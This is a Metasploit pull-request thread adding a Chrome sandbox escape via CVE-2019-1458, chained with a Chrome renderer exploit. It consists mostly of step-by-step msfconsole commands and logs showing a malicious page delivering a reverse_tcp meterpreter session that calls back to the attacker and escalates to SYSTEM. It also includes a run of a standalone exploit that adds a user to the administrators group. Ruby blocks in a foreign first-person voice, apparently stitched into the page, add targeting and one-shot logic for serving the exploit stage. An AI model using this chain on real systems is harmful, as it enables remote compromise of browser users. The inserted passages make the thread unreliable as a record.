CVE-2019-1458 chrome sandbox escape #13817

Merged: 12 commits into rapid7:master from chrome_object_create_sandbox_escape, Oct 15, 2020

Conversation

timwr (Contributor) commented Jul 7, 2020

This pull request demonstrates how #13221 (aka WizardOpium?)
can be combined with any chrome exploit (in this case https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/chrome_object_create.rb) in order to escape the sandbox.

Verification

Install Google Chrome 69.0.3497.92 on Windows 7 SP1

  • Start msfconsole
  • use exploit/multi/browser/chrome_object_create
  • set target 1
  • set URIPATH /
  • set payload windows/x64/meterpreter/reverse_tcp
  • set LHOST 192.168.56.1
  • set SRVHOST 192.168.56.1
  • set DEBUG_EXPLOIT true
  • run
  • Visit the URL with Chrome
  • Verify you get a meterpreter shell as SYSTEM

e.g.:

msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.6     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 192.168.56.6     chrome_object_create - [*] Properties p6 and p27 overlap after conversion to dictionary mode
[*] 192.168.56.6     chrome_object_create - [*] ArrayBuffer @ 0x7aed4e9ef20
[*] 192.168.56.6     chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 192.168.56.6     chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 192.168.56.6     chrome_object_create - [*] payload addr: 0x7e86fc1c000
[*] 192.168.56.6     chrome_object_create - [*] wasm_addr @ 0x78ab777cd98
[*] 192.168.56.6     chrome_object_create - [*] wasm_rwx @ 0x4fb2c1b0000
[*] 192.168.56.6     chrome_object_create - [*] div_addr @ 0xefd1c7da00
[*] 192.168.56.6     chrome_object_create - [*] el_addr @ 0x7b9545631f8
[*] 192.168.56.6     chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:49159) at 2020-07-07 18:25:56 +0800


msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49166 (192.168.56.6)

msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.92
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

timwr mentioned this pull request Jul 7, 2020

label-actions bot commented Jul 7, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

timwr force-pushed the chrome_object_create_sandbox_escape branch from ed4fd06 to de56fca, July 8, 2020 08:37
timwr removed the needs-docs label Jul 10, 2020
timwr (Contributor, Author) commented Jul 10, 2020

This is ready now, apologies for the delay

bcoles (Contributor) commented Jul 10, 2020

This did not work for me on Windows 7 SP1 (x64).

msf5 exploit(multi/browser/chrome_object_create) > set target 1
target => 1
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/D8go4VCD7i9I
[*] Local IP: http://172.16.191.165:8080/D8go4VCD7i9I
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I/payload to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 172.16.191.130   chrome_object_create - Sent stage2 exploit (20000 bytes)

However, when I downgraded Chrome to version 69 on my test host, it looks like this, which probably doesn't bode well for any of my tests.

[image: vaporwave]

I downloaded old versions from here:

The installers appear to be signed by Google.

bcoles (Contributor) commented Jul 10, 2020

I was still able to get a session using the --no-sandbox technique. However, the ntusermessagecall module failed to privesc.

msf5 exploit(multi/browser/chrome_object_create) > set target 0
target => 0
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/HKXQRg
[*] Local IP: http://172.16.191.165:8080/HKXQRg
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /HKXQRg to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.130:49843) at 2020-07-10 07:17:27 -0400

msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 8056 launched.
[*] Injecting exploit into 8056 ...
[*] Exploit injected. Injecting payload into 8056...
[*] Payload injected. Executing exploit...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information       Connection
  --  ----  ----                     -----------       ----------
  1         meterpreter x64/windows  TEST\user @ TEST  172.16.191.165:4444 -> 172.16.191.130:49843 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > 
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: TEST\user
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

bcoles (Contributor) commented Jul 10, 2020

Another test with --no-sandbox, showing a non-admin user that can't privesc with getsystem successfully elevating with ntusermessagecall:

msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/L9NqitS20WX
[*] Local IP: http://172.16.191.165:8080/L9NqitS20WX
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /L9NqitS20WX to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.130:50067) at 2020-07-10 07:23:46 -0400

msf5 exploit(multi/browser/chrome_object_create) > use exploit/windows/local/ntusermessagecall 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 2
session => 2
msf5 exploit(windows/local/ntusermessagecall) > options

Module options (exploit/windows/local/ntusermessagecall):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PROCESS  notepad.exe      yes       Name of process to spawn and inject dll into.
   SESSION  2                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.191.165   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > run 

[-] Handler failed to bind to 172.16.191.165:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 4060 launched.
[*] Injecting exploit into 4060 ...
[*] Exploit injected. Injecting payload into 4060...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.130:50076) at 2020-07-10 07:24:02 -0400
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  2         meterpreter x64/windows  TEST\asdf @ TEST            172.16.191.165:4444 -> 172.16.191.130:50067 (172.16.191.130)
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST  172.16.191.165:4444 -> 172.16.191.130:50076 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 3 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > 

Using ntusermessagecall as a standalone privesc works:

[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 172.16.191.165
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:1337 
msf5 exploit(multi/handler) > [*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.130:49318) at 2020-07-10 08:06:08 -0400

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: TEST\test
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
Background session 1? [y/N]  
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 4156 launched.
[*] Injecting exploit into 4156 ...
[*] Exploit injected. Injecting payload into 4156...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.130:49330) at 2020-07-10 08:06:32 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

bcoles (Contributor) commented Jul 10, 2020

Also, Sent stage2 exploit (20000 bytes) is a lie. It should be 0x20000 (or not printed in hex), as per:

        loader_data = loader_data + "\0" * (0x20000 - loader_data.length)
        send_response(cli, loader_data, {'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
        print_good("Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)")

ie:

        print_good("Sent stage2 exploit (#{loader_data.length} bytes)")
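An added Ruby example (my own code, not the module's and not part of bcoles' comment) that reproduces the fixed-size padding the module applies to its stage-2 blob, shows why the logged size misleads, and adds the overflow check the padding line lacks. STAGE2_SIZE, pad_stage, original_message and describe_stage are names of my own:

```ruby
# Added example, not the module's code. Integer#to_s(16) yields "20000" with
# no radix marker, so the module's log read as twenty thousand decimal bytes
# for a 0x20000 (131072-byte) blob. pad_stage also fails clearly when the blob
# is larger than the slot, where "\0" * (negative) would raise a bare
# ArgumentError ("negative argument") from inside the request handler.

STAGE2_SIZE = 0x20000 # 131072 bytes, the size the renderer-side loader expects

# NUL-pad +data+ to exactly +size+ bytes, refusing input that does not fit.
def pad_stage(data, size = STAGE2_SIZE)
  if data.bytesize > size
    raise ArgumentError, format('stage2 is %d bytes, larger than the 0x%x slot', data.bytesize, size)
  end
  data + "\0" * (size - data.bytesize)
end

# The message the module printed: hex digits without a 0x prefix.
def original_message(data)
  "Sent stage2 exploit (#{data.length.to_s(16)} bytes)"
end

# An unambiguous message: decimal, with the hex size alongside for cross-checking.
def describe_stage(data)
  format('Sent stage2 exploit (%d bytes, 0x%x)', data.bytesize, data.bytesize)
end
```

For a 100-byte blob, pad_stage returns 131072 bytes; original_message then reports "20000 bytes" while describe_stage reports "131072 bytes, 0x20000". Note that the module's expression pads by .length (characters), which only equals .bytesize for the binary/ASCII data it handles.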

bcoles (Contributor) commented Jul 10, 2020

If at first you don't succeed, retry until you blue screen.

[image]

[image]

timwr (Contributor, Author) commented Jul 11, 2020

  1. Windows NT 6.1; WOW64 is the 32-bit version of Chrome; you can grab the 64-bit one here: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
  2. The bug is due to uninitialized memory, so you only get one chance to exploit it and subsequent attempts will fail. It's 100% reliable for me on Windows 7 SP1, but the box crashes after I exit the session and I'm not sure how to fix that.
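As an added example (Ruby, my own code, not part of this PR or the module): pre-flight checks that encode the constraints this thread establishes for the chain, namely 64-bit Chrome 69 on Windows 7 (a WOW64 user agent is 32-bit Chrome), an escape confirmed only on Windows 7 SP1 x64, and a kernel bug that fires once per boot. parse_ua, renderer_exploit_applicable?, sandbox_escape_applicable?, EscapeLedger and plan_for are hypothetical names; the two sample User-Agent strings are constructed to match the ones in the logs above:

```ruby
# Added example, not code from the Metasploit module or this PR.

# Sample User-Agent strings, constructed to match the thread's logs.
SAMPLE_UA_X64   = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'
SAMPLE_UA_WOW64 = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'

UA_RE = /\(Windows NT (?<nt>\d+\.\d+); (?<arch>WOW64|Win64; x64)\).*Chrome\/(?<major>\d+)\./
OS_RE = /Windows 7 \(6\.1 Build (?<build>\d+), Service Pack (?<sp>\d+)\)/

# Pull NT version, bitness and Chrome major version out of a User-Agent.
# Returns nil for anything that is not Chrome on Windows.
def parse_ua(ua)
  m = UA_RE.match(ua)
  return nil unless m
  { nt: m[:nt], x64: m[:arch] == 'Win64; x64', chrome_major: m[:major].to_i }
end

# The renderer exploit the module serves targets 64-bit Chrome 69 on
# Windows 7 (NT 6.1); a WOW64 UA is 32-bit Chrome and should get nothing.
def renderer_exploit_applicable?(ua)
  info = parse_ua(ua)
  return false unless info
  info[:nt] == '6.1' && info[:x64] && info[:chrome_major] == 69
end

# Given the OS and Architecture lines a meterpreter `sysinfo` prints, true only
# for Windows 7 SP1 (build 7601) x64, the one platform the escape was confirmed on.
def sandbox_escape_applicable?(os:, arch:)
  m = OS_RE.match(os)
  return false unless m
  m[:build] == '7601' && m[:sp] == '1' && arch == 'x64'
end

# Per-host bookkeeping for a one-shot bug: the first claim for a host succeeds,
# later ones are refused until the operator records a reboot with reset.
class EscapeLedger
  def initialize
    @attempted = {}
  end

  def claim(host)
    return false if @attempted[host]
    @attempted[host] = true
  end

  def reset(host)
    @attempted.delete(host)
    nil
  end
end

# Decide what to do with a client, the way a browser module's request handler
# might before serving the sandbox-escape stage.
def plan_for(ua, host, ledger)
  return :skip_unsupported_browser unless renderer_exploit_applicable?(ua)
  return :skip_already_attempted unless ledger.claim(host)
  :serve_sandbox_escape
end
```

The second call of plan_for for the same host returns :skip_already_attempted, which is the behaviour you want when, as in this thread, a failed attempt leaves the box in a state where a retry only ends in a blue screen.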

bcoles (Contributor) commented Jul 11, 2020

> Windows NT 6.1; WOW64 is the 32bit version of chrome

I pasted the wrong log in the first comment. I realized the first test was on x86 and changed over to x64. Everything above was performed on x64.

bcoles (Contributor) commented Jul 11, 2020

> It's 100% reliable for me on Windows 7 SP1

I tried a few times, rebooting between each attempt, with no luck on Windows 7 SP1. But given that my Chrome looks like it is screaming in pain before exploitation, that doesn't mean much.

The ntusermessagecall module works well. FWIW, I was able to exploit with it even after a failed exploitation attempt via Chrome, indicating that Chrome is not attempting exploitation, given that it's exploitable only once.

xaitax (Contributor) commented Jul 15, 2020

Was able to confirm the latest pull request on Win7 x64 with Chrome 69.0.3497.100 (64-bit) and PrivEsc works fine.

Furthermore tried it on Win8.1 x64 but didn't succeed.

smcintyre-r7 previously approved these changes Aug 25, 2020
timwr (Contributor, Author) commented Aug 26, 2020

@xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

gwillcox-r7 (Contributor) commented:

@timwr Not sure this is working at the moment; I tried this two times with the sandbox enabled and this is basically what I got:

msf5 exploit(multi/browser/chrome_object_create) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:8080/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p12 and p21 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x330bc7a40f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x27624222718
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x24616300000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x6109c9e8f70
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6eb3a9831f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...

Then the Chrome tab crashed on the other side. Using https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.92-20074/download/ as the download source and running it on a Windows 7 x64 SP1 machine with no updates.

Here is the result if I try it with no sandbox:

msf5 exploit(multi/browser/chrome_object_create) >
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p16 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x79edd2240f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x6e6fe27b528
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x5520c4b0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x2bb8e87cb60
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6ba3fcc31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 2 opened (169.254.115.5:4444 -> 169.254.133.29:49159) at 2020-08-28 15:25:16 -0500

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: test-PC\test
meterpreter >

gwillcox-r7 (Contributor) commented:

> @xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Taking a look at this now, will let you know what the results are.

gwillcox-r7 dismissed smcintyre-r7's stale review August 28, 2020 20:37:

Dismissing review as we were unable to reproduce the exploit, and this leads to the misleading conclusion that this code is ready to land.

gwillcox-r7 (Contributor) commented Aug 28, 2020

> @xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Results:

C:\Users\low\Desktop>cve-2019-1458.exe
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
Usage: cve-2019-1458.exe command
Example: cve-2019-1458.exe "net user admin admin /ad & net user localgroup administrators admin /ad"

WARNING: YOU ONLY HAVE ONE CHANCE!!!
C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user

User accounts for \\TEST

-------------------------------------------------------------------------------
Administrator            Guest                    low
user
The command completed successfully.

C:\Users\low\Desktop>net user admin admin /add
System error 5 has occurred.

Access is denied.

C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.

C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
user
The command completed successfully.


C:\Users\low\Desktop>net localgroup administrators admin /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net localgroup administrators low /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>cve-2019-1458.exe "net localgroup administrators low /add"
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
[*] tagWND: 0xFFFFF90140823A70, tagCLS:0xFFFFF901408209C0, gap:0x30b0
[*] Registering window
[*] Creating instance of this window
[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x0000000000040066
[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced
[*] GetLastError = 0
[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130
[*] Simulating alt key press
[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time
[*] tagWND: 0xFFFFF9014081A370
[+] Exploit success!
[*] Trying to execute net localgroup administrators low /add as SYSTEM
[+] ProcessCreated with pid 2388!
===============================
The command completed successfully.


C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
low
user
The command completed successfully.


C:\Users\low\Desktop>

This shows that this succeeds in adding the low user to the administrators group (before low was just a normal user).

timwr (Contributor, Author) commented Sep 8, 2020

Apologies, but I implemented this change (e9ef1bb) without updating the instructions.
@gwillcox-r7 did you test with set target 1 or the default?

gwillcox-r7 (Contributor) commented:
@timwr I think I probably tried the default options. I used the testing instructions so most likely I didn't use the set target 1 option. Sorry! I'll try retest this again with that option.

gwillcox-r7 (Contributor) left a review:

Overall looks pretty good, but did have a few questions and comments on the module. Apologies in advance if I misunderstood anything, this was intended to be a complete review to prune out any potential odd behavior.

(5 review comments on modules/exploits/windows/local/ntusermessagecall.rb, now outdated and resolved)
gwillcox-r7 (Contributor) commented:
@timwr Going to work on making the changes necessary to fix up the rest of these issues today, so if you see any commits to your branch this is what they are related to.

gwillcox-r7 (Contributor) commented:
@timwr Just realized after all of this that the documentation for exploits/multi/browser/chrome_object_create.rb will also need to be updated now that we added in extra options and since the line we have in that documentation about **This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option** is no longer applicable.

timwr (Contributor, Author) commented Oct 12, 2020

The changes you made look great! I re-tested it again with target 1 and it works. I will update the documentation with the results. Thanks @gwillcox-r7 !

timwr force-pushed the chrome_object_create_sandbox_escape branch from 6cc2186 to de9dccb, October 13, 2020 07:46
gwillcox-r7 (Contributor) left a review:

Minor changes required, otherwise this is pretty much ready to go. Left some comments for reference but I can go ahead and make these edits myself.

@@ -18,6 +21,7 @@ You may also need to disable Windows Defender.
## Verification Steps

1. Do: ```use exploit/multi/browser/chrome_object_create```
1. Do: ```set target 0```
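Review bot: the step `set target 0` in Verification Steps selects the renderer-only target, which only yields a session when Chrome is launched with --no-sandbox, while the sandbox-escape target this PR adds (target 1) is the path that actually needs verifying; list a verification run for each target, and add the Options section the docs are missing so a reader knows what targets 0 and 1 mean.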
gwillcox-r7 commented on this hunk:

Eh, technically speaking this implies that this value will always be 0. Minor complaint, though. Main thing I am noticing when looking at this documentation is that we don't have an Options section. So I was a little confused at first why we didn't list the various options for target and explain what they did. Might be an idea to add that in to this documentation file to bring it up to date.

Otherwise changes on this look good, thanks for doing this!

Comment on lines 4 to 7
This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully.

Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once.
Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.
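Review bot: "vulnerable versions of Windows (e.g Windows 7)" is vaguer than what this thread confirmed and what the module supports: the escape was verified only on Windows 7 SP1 x64 with 64-bit Chrome 69, did not succeed on Windows 8.1 x64, and the module's sole target is "Windows 7 x64", so state that explicitly; also "e.g" should read "e.g.".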
gwillcox-r7 commented on these lines:

These lines look great but my concern is that you have individual lines that are way too long, when they should be broken up into multiple lines (even if they are within the same sentence). Can you run tools/dev/msftidy_docs.rb on this file and try address some of the concerns it raises? It should note a few things such as long lines like these that can be tidied up to help make the documentation easier to read.

timwr (Contributor, Author) commented Oct 15, 2020

@gwillcox-r7 I've addressed most of the msftidy_docs issues, but I still get the following:

documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Docs should start with ## Vulnerable Application
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Missing Section: ## Options
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/multi/browser/chrome_object_create.md:22 - [WARNING] Line too long (153). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.

I'm not sure about the remaining ones:

  1. The docs start with a description (not ## Vulnerable Application), as does the module_doc_template.md and every other doc.
  2. There are no non-standard options that need to be documented, so I left out ## Options
  3. See 1).
  4. There is no way to split up this hyperlink into multiple lines.

gwillcox-r7 (Contributor) commented Oct 15, 2020

@timwr The template is a bit old and may not have been updated. I think we now just generally place that description section under ## Vulnerable Application. As for point 2, that is a known issue with the script as we have it at the moment, and normally I would ignore it; however, there is still value in documenting your various Target options here. I will do this so long. As for point 3, that is a consequence of point 1. And finally, point 4 can be safely ignored; we will potentially be looking at a fix for this in the future as it is a known issue of our checks, but right now it's not anything that will break expectations.

Edit: Wow, I completely overlooked the fact that we already documented the Targets option later on.... I'll add this section in just for compliance purposes and write a small description to match.

gwillcox-r7 (Contributor) commented:
@timwr With last updates this should be ready to land, so going to just go ahead and do some rebasing to clear up the commit history and then land this in. Thanks for your patience on this!

gwillcox-r7 force-pushed the chrome_object_create_sandbox_escape branch from 7cf875e to 87104a7, October 15, 2020 16:01
gwillcox-r7 merged commit 43e412f into rapid7:master Oct 15, 2020
gwillcox-r7 (Contributor) commented Oct 15, 2020

Original Release Notes

This PR adds support for exploiting CVE-2019-1458, aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the exploit/multi/browser/chrome_object_create.rb module that exploits CVE-2018-17463 in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.

pbarry-r7 added the rn-modules (release notes for new or majorly enhanced modules) label Oct 28, 2020
pbarry-r7 (Contributor) commented Oct 28, 2020

Release Notes

New module exploit/windows/local/cve_2019_1458_wizardopium can be used as a standalone local exploit for CVE-2019-1458 (aka WizardOpium) to achieve LPE on vulnerable Windows targets or as a sandbox escape option with exploit/multi/browser/chrome_object_create.

gwillcox-r7 mentioned this pull request Nov 10, 2020
rapid7 deleted a comment Sep 5, 2021
Labels: docs, module, rn-modules